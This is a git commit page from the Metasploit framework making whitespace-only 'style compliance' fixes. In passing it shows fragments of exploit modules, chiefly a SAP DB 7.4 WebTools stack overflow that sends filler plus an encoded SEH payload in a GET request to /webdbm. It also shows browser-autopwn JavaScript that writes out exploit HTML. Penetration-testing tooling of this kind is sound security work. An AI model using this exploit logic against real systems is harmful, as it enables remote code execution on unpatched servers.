style compliance fixes
git-svn-id: file:///home/svn/framework3/trunk@9842 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
f4f1c1105d
commit
d07e613504
|
@ -696,7 +696,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
opts['Symbols']['Methods'].push("#{func_name}")
|
||||
end
|
||||
}
|
||||
js << "var noscript_exploits = \""
|
||||
js << "var noscript_exploits = \""
|
||||
js << Rex::Text.to_hex(build_noscript_html(cli, request), "%")
|
||||
js << "\";"
|
||||
js << 'noscript_div = document.createElement("div");'
|
||||
|
|
|
@ -23,8 +23,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Author' => [ 'Thomas Ring', 'jduck' ],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('UPLOADDIR', [ true, "The directory to use for the upload test", '/incoming' ])
|
||||
|
|
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
|
||||
|
||||
#
|
||||
# Superceded by ms10_018_ie_behaviors, disable for BrowserAutopwn
|
||||
#
|
||||
|
|
|
@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in SAP DB 7.4 WebTools.
|
||||
By sending an overly long GET request, it may be possible for
|
||||
an attacker to execute arbitrary code.
|
||||
an attacker to execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Space' => 850,
|
||||
'BadChars' => "\x00",
|
||||
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
|
||||
'EncoderOptions' =>
|
||||
{
|
||||
'BufferRegister' => 'ECX',
|
||||
|
@ -67,15 +67,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
filler = rand_text_alphanumeric(20774)
|
||||
seh = generate_seh_payload(target.ret)
|
||||
|
||||
|
||||
sploit = filler + seh + rand_text_alphanumeric(3000)
|
||||
|
||||
print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret)
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => '/webdbm',
|
||||
'query' => 'Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=' + sploit
|
||||
}, 5)
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => '/webdbm',
|
||||
'query' => 'Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=' + sploit
|
||||
}, 5)
|
||||
|
||||
handler
|
||||
|
||||
|
|
Loading…
Reference in New Issue